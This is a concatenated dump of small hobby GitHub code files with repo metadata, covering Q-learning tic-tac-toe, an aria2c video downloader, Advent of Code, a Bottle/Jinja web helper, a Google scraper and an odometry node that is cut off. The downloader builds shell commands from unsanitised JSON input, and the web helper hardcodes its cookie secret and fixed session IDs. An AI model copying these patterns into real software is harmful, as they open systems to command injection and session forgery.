result = s.swapPairs(head)\n while result:\n print(result.val)\n result = result.next\n\n","repo_name":"leet001/leetcode_share","sub_path":"medium/Q_24.py","file_name":"Q_24.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21579474307","text":"from random import choice\nfrom utils import all_proper_move\nfrom utils import activate_end\nfrom utils import control_win\nfrom utils import random_player\n\n\n\n\ndef q_table_generator(test_games):\n\n \n '''\n Our Q table is a dictionary where key is string with board state.\n Firstly we assume value 0 for all state, except winning state.\n We generate Q table with all legal state by,\n significant number games between random players. \n Number of legal state in tic tac toe is 5478,\n there is no obviously way to calculate that.\n '''\n \n ALPHA = 0.9\n GAMMA = 0.9\n \n \n legal_state_number = 5478\n \n \n Q_table = {}\n \n BOARD = ['_', '_', '_', '_', '_', '_', '_', '_', '_']\n Q_table[''.join(BOARD)] = 0\n while len(Q_table) < legal_state_number:\n BOARD = ['_', '_', '_', '_', '_', '_', '_', '_', '_']\n sign = 'O'\n turn = choice(['player_1', 'player_2'])\n while not activate_end(BOARD):\n if turn == 'player_1':\n random_player(BOARD, sign)\n else:\n random_player(BOARD, sign)\n if control_win(BOARD):\n if sign == 'O':\n Q_table[''.join(BOARD)] = 1\n else:\n Q_table[''.join(BOARD)] = -1\n break\n else:\n Q_table[''.join(BOARD)] = 0\n if sign == 'O':\n sign = 'X'\n else:\n sign = 'O'\n if turn == 'player_1':\n turn = 'player_2'\n else:\n turn = 'player_1'\n \n \n \n Q_control = dict(zip(Q_table.keys(),\n [0 for k in range(len(Q_table.values()))])) \n # Completing Q table by game with random players in purly exploration way\n \n for k in range(test_games):\n BOARD = ['_', '_', '_', '_', '_', '_', '_', '_', '_']\n sign = 'O'\n episode = []\n signs = []\n episode.append(''.join(BOARD))\n while not activate_end(BOARD):\n \n if sign == 'O':\n if not Q_control[''.join(BOARD)]:\n Q_control[''.join(BOARD)] = 1\n \n random_player(BOARD, sign)\n signs.append(sign)\n episode.append(''.join(BOARD))\n else:\n if not Q_control[''.join(BOARD)]:\n Q_control[''.join(BOARD)] = 1\n \n random_player(BOARD, sign)\n signs.append(sign)\n episode.append(''.join(BOARD))\n \n if control_win(BOARD):\n break\n if sign == 'O':\n sign = 'X'\n else:\n sign = 'O'\n \n \n episode = episode[:len(episode) - 1]\n episode = episode[::-1]\n signs = signs[::-1]\n for k in range(len(episode)):\n Q_table[episode[k]] = Q_table[episode[k]] + ALPHA * (GAMMA *\\\n max([Q_table[element] for element in all_proper_move([*episode[k]], signs[k])])\\\n - Q_table[episode[k]]) \n\n return Q_table, Q_control","repo_name":"KordianChi/tic-tac-toe_with_Q_learning","sub_path":"q_table.py","file_name":"q_table.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14695882666","text":"import os \nimport json\n\ndef downloadVideos(vidName, downloadLink):\n\tcommand \t= f\"aria2c -s 10 -j 10 -x 16 -k 5M --file-allocation=none '{downloadLink}' -o '{vidName.replace(' ', '_').replace('/', '')}.mp4' -c\"\n\tprint(command)\n\tos.system(command)\n\ndef main():\n\tlinksFile \t= \"downloads.json\"\n\twith open(linksFile, 'r') as f: contents = json.loads(f.read().strip())\n\n\tfor objs in contents:\n\t\tfor name, ddl in objs.items():\n\t\t\tdownloadVideos(name, ddl)\n\nif __name__ == '__main__':\n\ttry:\n\t\tmain()\n\n\texcept KeyboardInterrupt:\n\t\texit(\"[!] okay-sed :(\")","repo_name":"Hollow667/infosecinstitute-dl","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"71393210066","text":"\"\"\"\nI used a dataclass for this task today just because I wanted to finally try it out. Also I was curious if it helps\nto write a classmethod that parses the input and then a bunch of staticmethod to do the actual work on things.\nTurns out this actually makes the code very readable and tidied up, so I might come back to this in the future.\nThere was no real necissity for the dataclass in the end however - anyways I still liked it.\n\"\"\"\nfrom dataclasses import dataclass\nfrom collections import defaultdict\n\n_uniques = [2, 3, 4, 7]\n\n\n@dataclass\nclass SubmarineInterface:\n input: list\n output: list\n\n @classmethod\n def parser(cls, s: list):\n input = [i.split(' | ')[0] for i in s]\n output = [i.split(' | ')[1] for i in s]\n return cls(input, output)\n\n @staticmethod\n def count_unique_numbers(numbers: list):\n cnt = 0\n for num in ' '.join(numbers).split(' '):\n if len(num) in _uniques:\n cnt += 1\n return cnt\n\n @staticmethod\n def decode_wires(line: str):\n wires = defaultdict(set)\n while len(wires) < 10 or set() in wires.values():\n for char in line.split(' '):\n if len(char) == 6 and wires[1].issubset(set(char)) and not wires[4].issubset(set(char)):\n wires[0] = set(char)\n elif len(char) == 2:\n wires[1] = set(char)\n elif len(char) == 5 and wires[1].issubset(set(char)):\n wires[3] = set(char)\n elif len(char) == 4:\n wires[4] = set(char)\n elif len(char) == 5 and wires[4].difference(wires[1]).issubset(set(char)):\n wires[5] = set(char)\n elif len(char) == 6 and not wires[1].issubset(set(char)):\n wires[6] = set(char)\n elif len(char) == 3:\n wires[7] = set(char)\n elif len(char) == 7:\n wires[8] = set(char)\n elif len(char) == 6 and wires[1].issubset(set(char)) and wires[4].issubset(set(char)):\n wires[9] = set(char)\n elif len(char) == 5 and not set(char).issubset(wires[3]) and not set(char).issubset(wires[5]):\n wires[2] = set(char)\n else:\n pass\n return wires\n\n def decode_outputs(self, inputs: str, outputs: str):\n result = ''\n decode = self.decode_wires(inputs)\n for out in outputs.split(' '):\n result += str(list(decode.keys())[list(decode.values()).index(set(out))])\n return int(result)\n\n\nfile = 'input_puzzles/day_8.txt'\nwith open(file, 'r') as f:\n data = f.read().splitlines()\n\nsf = SubmarineInterface.parser(data)\nres_p1 = sf.count_unique_numbers(sf.output)\nres_p2 = sum([sf.decode_outputs(sf.input[ii], out) for ii, out in enumerate(sf.output)])\n\nprint(f'Part 1: {res_p1}')\nprint(f'Part 2: {res_p2}')\n","repo_name":"kolschew/adventofcode_2021","sub_path":"aoc_day_8.py","file_name":"aoc_day_8.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2579735312","text":"\r\n#Imports\r\n\r\nfrom textblob import TextBlob\r\nfrom newspaper import Article\r\nimport nltk\r\nnltk.download(\"punkt\")\r\n\r\nurl = \"https://en.wikipedia.org/wiki/Classical_architecture\"\r\narticle = Article(url)\r\n\r\narticle.download()\r\narticle.parse()\r\narticle.nlp()\r\n\r\ntext = article.summary\r\nprint(text)\r\n\r\nblob = TextBlob(text)\r\nsentiment = blob.sentiment.polarity #from -1 to 1\r\nprint(f\"The sentiment of this text is {sentiment}\")\r\n\r\n\r\nwith open(\"C:/Users/danie/PycharmProjects/TextAnalysis/venv/mytext.txt\",\"r\") as f:\r\n text = f.read()\r\n\r\nprint(text)\r\nblob = TextBlob(text)\r\nsentiment = blob.sentiment.polarity # from -1 to 1\r\nprint(f\"The sentiment of this text is {sentiment}\")","repo_name":"danielelongo14/MachineLearning","sub_path":"TextSentimentAnalysis.py","file_name":"TextSentimentAnalysis.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5533301657","text":"import json\n\n\nclass Load:\n json_data = {}\n\n def __init__(self, name, type):\n self.name = name\n self.type = type\n self.read_json()\n\n def read_json(self):\n with open('el_loads.json') as loads:\n self.json_data = json.load(loads)\n\n def get_consumption(self):\n for type_of_load in self.json_data['loads']:\n if type_of_load['name'] == self.name:\n for types in type_of_load['types']:\n if types['name'] == self.type:\n return types['consumption']\n return None\n\n\nif __name__ == '__main__':\n l = Load('bulb', 'halogen')\n print(l.get_consumption())","repo_name":"icavrak/SmartHomeSim","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12187791377","text":"import csv\nimport os\nimport random\n\nfrom shutil import copy, copyfile\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\"\"\"\nSeparates train and test data and copies them to the folder, \nthat match their category\n\"\"\"\ndef sort_data_to_folders(train_p, test_p):\n root = \"data/car_ims/\"\n train_root = \"data/train/\"\n test_root = \"data/test/\"\n annotation_file = \"data/anno.csv\"\n\n with open(annotation_file, 'rt') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=';')\n data = {}\n for row in reader:\n data[row[\"Image\"]] = row[\"class\"]\n keys = list(data.keys())\n train_size = int(len(keys) * train_p)\n test_size = int(len(keys) * test_p)\n random.shuffle(keys)\n for name in keys[:train_size]:\n directory = train_root + data[name] + \"/\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n copyfile(root + name, directory)\n print(\"sorting train images to directories done!\")\n\n for name in keys[-test_size:]:\n directory = test_root + data[name] + \"/\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n copyfile(root + name, directory)\n print(\"sorting test images to directories done!\")\n\n image_gen = ImageDataGenerator(rescale=1.0 / 255)\n train_iterator = image_gen.flow_from_directory(\"data/car_ims/\",\n batch_size=128,\n target_size=(224, 224))\n\nsort_data_to_folders(.8, .2)\n","repo_name":"banda13/Carrecognizer","sub_path":"input/stanford/sorter.py","file_name":"sorter.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72763990867","text":"from django.conf import settings\nfrom django.conf.urls import *\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', 'main.views.index', name=\"home\"),\n url(r'^home$', 'main.views.home', name=\"project_data\"),\n url(r'^upload$', 'main.views.upload', name=\"upload\"),\n url(r'^project$', 'main.views.create_project', name=\"project\"),\n url(r'^apiUpload/(?P\\d+)$', 'main.views.apiUpload', name=\"apiUpload\"),\n url(r'^login$', 'django.contrib.auth.views.login', name=\"login\"),\n url(r'^logout$', 'django.contrib.auth.views.logout', name=\"logout\"),\n url(r'^add_edit_effort/(?P\\d+)$', 'main.views.add_edit_effort', name='add_edit_effort'),\n url(r'^project/(?P\\d+)$', 'main.views.project_details', name='project_details'),\n (r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^site_media/(?P.*)$', 'django.views.static.serve', \n {'document_root': settings.MEDIA_ROOT}),)\n urlpatterns += staticfiles_urlpatterns()\n","repo_name":"bhartenduspoton/Versioning-pilot","sub_path":"example_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30088121916","text":"import jinja2\nsecret=\"dupiedupiedupie!Ana!Duppy!DyppyDyppyDuppy!\"\nimport os.path\n\n\n\nclass WSGIToolsClass():\n def __init__(self):\n self.bottle.post (\"/newuser\") (self.createAccount)\n self.bottle.route(\"/resource//\") (self.getStaticFiles)\n self.bottle.route(\"/favicon.ico\") (self.getStaticICO)\n\n self.bottle.route(\"/\") (self.checkAuth(self.loadMainPage))\n self.bottle.route(\"/deleteuser\")(self.checkAuth(self.deletemyaccount))\n super().__init__()\n\n def getStaticICO(self):\n return self.bottle.static_file(\"favicon.ico\", root='/var/www/wsgi/dupie/resource/img/')\n\n\n def createAccount(self):\n username = self.bottle.request.forms.get(\"username\")\n self.bottle.response.set_cookie(\"username\",username,secret=secret )\n self.bottle.response.set_cookie(\"uid\",101, secret=secret)\n self.bottle.response.set_cookie(\"sessionid\",1001, secret=secret)\n return self.getTemplate('user_new_post.html').render(\n DTO={ \"username\":username },\n BreadCrumbs=[]\n )\n\n def getStaticFiles(self,folder, filename):\n # if developing comment out below line\n if (filename[-3:] != \"mp3\" and filename[-3:] != \"css\" and filename[-3:] != \".js\"):\n self.bottle.response.set_header('Cache-Control', 'must-revalidate')\n else:\n# self.bottle.response.set_header(\"Cache-Control\", \"public, max-age=604800\")\n print (filename)\n\n # TODO: this probably isn't necessary, but will put regex here\n # if filename in [\"aquabutton.jpg\",\"nh1.mp3\",\"questionbox.jpg\"]:\n if (folder==\"vocab\") or (folder==\"prompt\"):\n if (os.path.isfile(\"/var/www/wsgi/dupie/resource/%sx/%s\" % (folder,filename))):\n return self.bottle.static_file(filename, root='/var/www/wsgi/dupie/resource/%sx' % (folder))\n\n \n return self.bottle.static_file(filename, root='/var/www/wsgi/dupie/resource/%s' % (folder))\n # else:\n # return bottle.abort(404, \"File not found.\")\n\n def loadMainPage(self):\n return self.getTemplate('main_main_get.html').render(\n DTO={ \"username\":self.cookie(\"username\")},\n BreadCrumbs=[]\n )\n\n def deletemyaccount(self):\n self.bottle.response.delete_cookie(\"username\") \n self.bottle.response.delete_cookie(\"uid\") \n self.bottle.response.delete_cookie(\"sessionid\") \n return self.getTemplate('user_delete_get.html').render(\n DTO={ \"username\":self.cookie(\"username\")},\n BreadCrumbs=[]\n )\n\n def cookie(self,name):\n return self.bottle.request.get_cookie(name, secret=secret)\n\n def getTemplate(self, document):\n file_loader = jinja2.FileSystemLoader(\n [\n \"/var/www/wsgi/dupie/template/quiz\",\n \"/var/www/wsgi/dupie/template/tools\",\n \"/var/www/wsgi/dupie/template/templates\",\n \"/var/www/wsgi/dupie/template/videos\",\n \"/var/www/wsgi/dupie/template/ttsbatchload\",\n \"/var/www/wsgi/dupie/template/review\"\n ]\n \n )\n env = jinja2.Environment(loader=file_loader)\n template = env.get_template(document)\n return template\n\n\n\n\n\n\nclass CheckAuthClass():\n def __init__(self):\n super().__init__()\n\n def butWhoAreYou(self):\n return self.getTemplate('user_new_get.html').render(\n DTO={ \"username\":self.cookie(\"username\")},\n BreadCrumbs=[]\n )\n\n def userUnknown(self):\n self.bottle.response.set_header('Cache-Control', 'must-revalidate')\n return (str(self.bottle.request.get_cookie(\"username\",secret=secret)) == \"None\")\n\n def checkAuth(self, bottle_function):\n def wrapper(*args, **kwargs):\n if self.userUnknown(): \n return self.butWhoAreYou()\n else:\n return bottle_function(*args, **kwargs)\n return wrapper","repo_name":"Dupie696/dupie","sub_path":"src/website/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34017458650","text":"\nfrom itertools import product, combinations\nimport math\nimport random\nimport sys\nimport collections\nfrom pathlib import Path\nimport numpy as np\n\nrandom.seed(42)\n\nif Path(__file__).stem == \"Main\":\n DEBUG_OUT = False\nelse:\n DEBUG_OUT = False\n DEBUG_OUT = True\n\n\ndef q_E_top():\n if DEBUG_OUT:\n \"\"\"\n q_E(\n 9, 3,\n [\n [8, 3],\n [4, 2],\n [2, 1],\n ]\n )\n q_E(\n 100, 6,\n [\n [1, 1],\n [2, 3],\n [3, 9],\n [4, 27],\n [5, 81],\n [6, 243],\n ]\n )\n \"\"\"\n q_E(\n 9999, 10,\n [\n [540, 7550],\n [691, 9680],\n [700, 9790],\n [510, 7150],\n [415, 5818],\n [551, 7712],\n [587, 8227],\n [619, 8671],\n [588, 8228],\n [176, 2461],\n ]\n )\n else:\n q_E()\n\n\ndef q_E(h=None, n=None, ab_list=None):\n if not DEBUG_OUT:\n h, n = list(map(int, input().split()))\n a_list = []\n b_list = []\n for _ in range(n):\n a, b = list(map(int, input().split()))\n a_list.append(a)\n b_list.append(b)\n else:\n a_list = []\n b_list = []\n for a, b in ab_list:\n a_list.append(a)\n b_list.append(b)\n\n cp = [] # cost performance\n for a, b in zip(a_list, b_list):\n cp.append(a / b)\n\n b_used = 0\n while True:\n i_most_cp_magic = cp.index(max(cp))\n\n # 最高のcost performanceの魔法1回でh<=0になるなら終わり\n if h - a_list[i_most_cp_magic] <= 0:\n b_used += b_list[i_most_cp_magic]\n break\n\n # そうでないなら、最高のcost performanceの魔法でとにかく減らす\n b_used += b_list[i_most_cp_magic] * (h // a_list[i_most_cp_magic])\n h = h % a_list[i_most_cp_magic]\n if h==0:\n break\n\n # update cp table\n for i in range(n):\n if h < a_list[i]:\n # cost performanceが���がる\n cp[i] = h / b_list[i]\n\n print(b_used)\n\n\n\n\nif __name__ == \"__main__\":\n # q_A_top()\n # q_B_top()\n # q_C_top()\n # q_D_top()\n q_E_top()\n","repo_name":"zinziroge/atcoder","sub_path":"src/abc/abc153.py","file_name":"abc153.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1225471096","text":"import logging\nfrom config.base_config import *\nfrom selenium import webdriver\n\n# 工具类\nclass DriverUtils:\n __driver = None\n __switch = False\n\n # 获取浏览器驱动\n @classmethod\n def get_driver(cls):\n if cls.__driver is None:\n logging.info(\"creat chrome driver\")\n cls.__driver = webdriver.Chrome(options=CHROME_OPTIONS)\n cls.__driver.maximize_window()\n cls.__driver.implicitly_wait(5)\n else:\n logging.info(\"use existed chrome driver\")\n return cls.__driver\n\n # 关闭浏览器驱动\n @classmethod\n def quit_driver(cls):\n if cls.__driver is not None:\n logging.info(\"quit chrome driver\")\n cls.__driver.quit()\n cls.__driver = None\n else:\n logging.info(\"chrome driver is still alive\")\n\n @classmethod\n def set_switch(cls, switch):\n cls.__switch = switch\n\n @classmethod\n def back_ops(cls):\n # time.sleep(2)\n cls.__driver.find_element_by_xpath(\"//div[@class='el-scrollbar__view']/span[1]\").click()\n cls.__driver.refresh()\n pass","repo_name":"zouqiaoyang/web-","sub_path":"utils/driver_utils.py","file_name":"driver_utils.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12771354512","text":"#!/usr/bin/env python\nimport sys, rospy\nfrom piavatar_ros.msg import LightSensorValues\n\nif __name__ == '__main__':\n devfile = '/dev/rtlightsensor0'\n rospy.init_node('lightsensors')\n pub = rospy.Publisher('lightsensors', LightSensorValues, queue_size=1)\n\n rate = rospy.Rate(1)\n while not rospy.is_shutdown():\n try:\n with open(devfile, 'r') as f:\n data = f.readlien().split()\n data = [ int(e) for e in data ]\n d = LightSensorValues()\n d.right_forward = data[0]\n d.right_side = data[1]\n d.left_side = data[2]\n d.left_forward = data[3]\n d.sum_all = sum(data)\n d.sum_forward = data[0] + data[3]\n pub.publish(d)\n except IOError:\n rospy.logerr(\"cannot write to \" + devfile)\n\n rate.sleep()\n \n","repo_name":"shodimaggio/piavatar_ros","sub_path":"src/lightsensors2.py","file_name":"lightsensors2.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72911196626","text":"# ordinal numbers are the numbers written in natural language.\n# ie: for integer '1' the ordinal numbers is 'one'.\n# ie: for integer '2' the ordinal numbers is 'two'.\n\n\ndef int_to_ordinal(integer, ORDINAL):\n '''This function convert integer to its ordinal number.'''\n for ordinal in ORDINAL:\n if ordinal == integer:\n print('...')\n return ORDINAL[ordinal]\n print('!!!')\n return ' '\n\n\ndef main():\n ORDINAL = {\n 1: 'one',\n 2: 'two',\n 3: 'three',\n 4: 'four',\n 5: 'five',\n 6: 'six',\n 7: 'seven',\n 8: 'eight',\n 9: 'nine',\n 10: 'ten',\n 11: 'eleven',\n 12: 'twelve',\n }\n # for ordinal in ORDINAL:\n # print(ORDINAL[ordinal])\n \n print('Enter an integer.')\n integer = int(input('> '))\n result = int_to_ordinal(integer, ORDINAL)\n print('Result =', result)\n\nif __name__ == '__main__':\n main()","repo_name":"farazahmediu01/The-Python-Workbook-","sub_path":"Experiment/Exercise 89 Convert an Integer to Its Ordinal Number.py","file_name":"Exercise 89 Convert an Integer to Its Ordinal Number.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14376006846","text":"import json\r\nimport requests\r\nfrom requests.exceptions import RequestException\r\nimport re\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import quote\r\nimport os\r\nfrom all_events import med_events\r\nimport pickle\r\n\r\nimport sys\r\nsys.setrecursionlimit(1000000)\r\n\r\n\r\ndef get_one_page(url):\r\n try:\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36'\r\n }\r\n response = requests.get(url, headers=headers)\r\n if response.status_code == 200:\r\n return response.text\r\n return None\r\n except RequestException:\r\n return None\r\n\r\n\r\ndef get_image_url(event_name,use_cn=False):\r\n query_item = '+'.join(event_name.split(' '))\r\n base_url = 'https://www.google.com'\r\n language = 'en'\r\n suffix = '&hl=zh-CN'\r\n url = 'https://www.google.com/search?q={}'.format(query_item)\r\n\r\n if use_cn:\r\n url += suffix\r\n language = 'cn'\r\n html = get_one_page(url)\r\n soup = BeautifulSoup(html,'lxml')\r\n select_tag = {'en':'Images','cn':u'图片'}\r\n image_href = ''\r\n # fw = open('html.txt','w',encoding='utf-8')\r\n # fw.write(html)\r\n for link in soup.find_all('a',class_='hide-focus-ring'):\r\n # print(link.text)\r\n if link.text == select_tag[language]:\r\n image_href = link.get('href')\r\n \r\n # print(image_href)\r\n image_link_href = base_url + image_href\r\n return image_link_href\r\n\r\n\r\ndef find_google_image(event_name,use_cn=False):\r\n image_link_href = get_image_url(event_name,use_cn)\r\n html = get_one_page(image_link_href)\r\n # print(image_link_href)\r\n # fw = open('html.txt','w',encoding='utf-8')\r\n # fw.write(html)\r\n soup = BeautifulSoup(html,'lxml')\r\n\r\n related_concepts = []\r\n\r\n for tag in soup.find_all('span',class_=\"hIOe2\"):\r\n # print(tag.string)\r\n related_concepts.append(tag.string)\r\n return related_concepts\r\n\r\n\r\ndef parse_one_page(url):\r\n h_tag = ['h1','h2','h3','h4','h5','h6']\r\n p_tag = 'p'\r\n title = {ele:[] for ele in h_tag}\r\n content = []\r\n\r\n html = get_one_page(url)\r\n soup = BeautifulSoup(html,'lxml')\r\n\r\n # parse title\r\n for tag_name in h_tag:\r\n for tag in soup.find_all(tag_name):\r\n text = tag.text.strip()\r\n title[tag_name].append(text)\r\n\r\n for tag in soup.find_all('p'):\r\n text = tag.text.strip()\r\n content.append(text)\r\n\r\n return title, content\r\n\r\n\r\ndef crawl_google_atricles(event_name,number = 50,use_cn = False):\r\n # pass\r\n print('Crawing pages of event: [{}]'.format(event_name))\r\n url = get_image_url(event_name,use_cn)\r\n html = get_one_page(url)\r\n soup = BeautifulSoup(html,'lxml')\r\n\r\n parse_links = []\r\n result_link_class = \"VFACy kGQAp sMi44c lNHeqe WGvvNb\"\r\n\r\n for tag in soup.find_all('a',class_=result_link_class):\r\n page_link = tag.get('href')\r\n if page_link != None:\r\n parse_links.append(page_link)\r\n if len(parse_links) >= number:\r\n break\r\n\r\n articles = {}\r\n\r\n for idx,page_link in enumerate(parse_links):\r\n print('{0}: Now paring link {1}'.format(idx,page_link))\r\n try:\r\n now_time = time.time()\r\n title, content = parse_one_page(page_link)\r\n print('Finished')\r\n articles[page_link] = [title,content]\r\n time.sleep(2)\r\n except:\r\n print('Parse Error')\r\n\r\n return articles\r\n\r\n\r\ndef show_article(articles):\r\n for key in articles.keys():\r\n article = articles[key]\r\n title, content = article[0], article[1]\r\n print(title)\r\n\r\n\r\ndef main():\r\n save_dir = 'google_articles'\r\n for event in med_events:\r\n events_split = event.split('_')\r\n event_name = ' '.join(events_split)\r\n print('Now deal with event : {}'.format(event_name))\r\n event_dir = event\r\n event_google_file = event_dir + '_google_article.json'\r\n \r\n event_result_dir = os.path.join(save_dir,event_dir)\r\n # print(event_result_dir)\r\n if not os.path.exists(event_result_dir):\r\n os.makedirs(event_result_dir)\r\n\r\n related_concepts = find_google_image(event_name)\r\n print('related_concepts is : ',related_concepts)\r\n\r\n if os.path.exists(os.path.join(event_result_dir,event_google_file)):\r\n articles = json.load(open(os.path.join(event_result_dir,event_google_file)))\r\n else:\r\n related_concepts = find_google_image(event_name)\r\n print('related_concepts is : ',related_concepts)\r\n pickle.dump(related_concepts,open(os.path.join(event_result_dir,'google_concepts.pkl'),'wb'))\r\n articles = crawl_google_atricles(event_name)\r\n json.dump(articles,open(os.path.join(event_result_dir,event_google_file),'w'))\r\n \r\n\r\n\r\ndef gen_google_first_order_concept():\r\n save_dir = 'google_articles'\r\n for event in med_events:\r\n event_result_dir = os.path.join(save_dir,event)\r\n related_concepts = pickle.load(open(os.path.join(event_result_dir,'google_concepts.pkl'),'rb'))\r\n print(event)\r\n print(related_concepts)\r\n\r\n\r\nif __name__ == '__main__':\r\n # main()\r\n gen_google_first_order_concept()\r\n\r\n","repo_name":"Rain-coder1/ZS-MED","sub_path":"search_google.py","file_name":"search_google.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"6565228551","text":"#!/usr/bin/env python3\n\nimport sys\nimport math\nsys.path.insert(0, '../../')\nimport util\n\nif __name__ == '__main__':\n\n ft = [math.factorial(i) for i in range(10)]\n\n l = []\n for i in range(11, 2600000):\n cur = list(str(i))\n cur = [ft[int(j)] for j in cur]\n if sum(cur) == i:\n l.append(i)\n\n print(sum(l))\n print(l)\n","repo_name":"bn-d/project_euler","sub_path":"000-100/034/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40215358592","text":"#!/usr/bin/env python\n\n\"\"\"\nThis program converts datas from DVL and IMU into the position of the robot.\nInput:\t/desisek_saga/dvl\n\t\t/desistek_saga/imu\nOutput:\t/odom\nIn __init__, set OFFSET_X, OFFSET_Y and OFFSET_Z equal to the distance in xyz between the DVL and the inertial center of the robot.\n\t , set STARTING_X, Y, Z equal to the xyz starting position of the robot, and STARTING_radianX, Y, Z equal to its orientation in radians\n\"\"\"\n\nimport rospy\nfrom sonar_mapping.msg import my_msg\nfrom uuv_sensor_ros_plugins_msgs.msg import DVL\nfrom sensor_msgs.msg import Imu\nfrom nav_msgs.msg import Odometry\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport sys\n\nclass dvl:\n\n\n\n\n\tdef __init__(self):\n\n\t\tsub_dvl = rospy.Subscriber('/desistek_saga/dvl', DVL, self.dvl_sub)\n\t\tsub_imu = rospy.Subscriber('/desistek_saga/imu', Imu, self.imu_sub)\n\t\tsub_correction = rospy.Subscriber('/SLAM/offset', my_msg, self.odom_sub)\n\n\t\tself.pubOdom = rospy.Publisher(\"/odom\", Odometry, queue_size=1)\n\n\t\tself.offset = my_msg()\n\n\t\t# value to correct the odomtry with the SLAM\n\n\t\tself.timeDVL = rospy.get_time()\n\t\tself.previous_time = 0\n\t\tself.dvlseq = 0\n\t\tself.dvlsecs = 0\n\t\tself.dvlnsecs = 0\n\t\tself.dvlX = 0\n\t\tself.dvlY = 0\n\t\tself.dvlZ = 0\n\n\t\t####################### To be se correctly depending on the robot configuration ###################\n\t\tself.OFFSET_X = 0\n\t\tself.OFFSET_Y = 0\n\t\tself.OFFSET_Z = 0\n\n\t\tself.STARTING_X = -250\n\t\tself.STARTING_Y = 300\n\t\tself.STARTING_Z = -5\n\t\tself.STARTING_radianX = 0\n\t\tself.STARTING_radianY = 0\n\t\tself.STARTING_radianZ = -1.0\n\t\t###################################################################################################\n\n\t\tself.timeIMU = rospy.get_time()\n\t\tself.quaternionX = 0\n\t\tself.quaternionY = 0\n\t\tself.quaternionZ = 0\n\t\tself.quaternionW = 0\n\t\tself.imuX = 0\n\t\tself.imuY = 0\n\t\tself.imuZ = 0\n\t\tself.angvelX = 0\n\t\tself.angvelY = 0\n\t\tself.angvelZ = 0\n\t\tself.lastImuX = 0\n\t\tself.lastImuY = 0\n\t\tself.lastImuZ = 0\n\n\t\tself.dvlReceived = False\n\n\t\tself.estimated_traj_x = self.STARTING_X\n\t\tself.estimated_traj_y = self.STARTING_Y\n\t\tself.estimated_traj_z = self.STARTING_Z\n\n\tdef odom_sub(self,msg):\n\n\t\tif msg.x == self.offset.x and msg.y == self.offset.y and msg.theta == self.offset.theta:\n\t\t\tpass\n\t\telse:\n\t\t\tself.offset.x += msg.x\n\t\t\tself.offset.y += msg.y\n\t\t\tself.offset.theta += msg.theta\n\n\n\n\t# The frequency of the DVL is lower than the IMU\n\tdef dvl_sub(self,msg):\n\t\tself.timeDVL = rospy.get_time()\n\n\t\tself.dvlseq = msg.header.seq\n\t\tself.dvlsecs = msg.header.stamp.secs\n\t\tself.dvlnsecs = msg.header.stamp.nsecs\n\t\tself.dvlX = msg.velocity.z \t\t############ /!\\ ###########\n\t\tself.dvlY = msg.velocity.y\n\t\tself.dvlZ = msg.velocity.x ############ /!\\ ###########\n\n\t\tself.dvlReceived = True\n\n\t# The frequency of the IMU is bigger than the DVL's\n\tdef imu_sub(self,msg):\n\t\tif self.dvlReceived == True:\n\t\t\tself.dvlReceived = False\n\t\t\tself.timeIMU = rospy.get_time()\n\t\t\tself.quaternionX = msg.orientation.x\n\t\t\tself.quaternionY = msg.orientation.y\n\t\t\tself.quaternionZ = msg.orientation.z\n\t\t\tself.quaternionW = msg.orientation.w\n\t\t\tX,Y,Z = self.quaternion_to_euler(self.quaternionX,self.quaternionY,self.quaternionZ,self.quaternionW)\n\t\t\tself.imuX = X\n\t\t\tself.imuY = 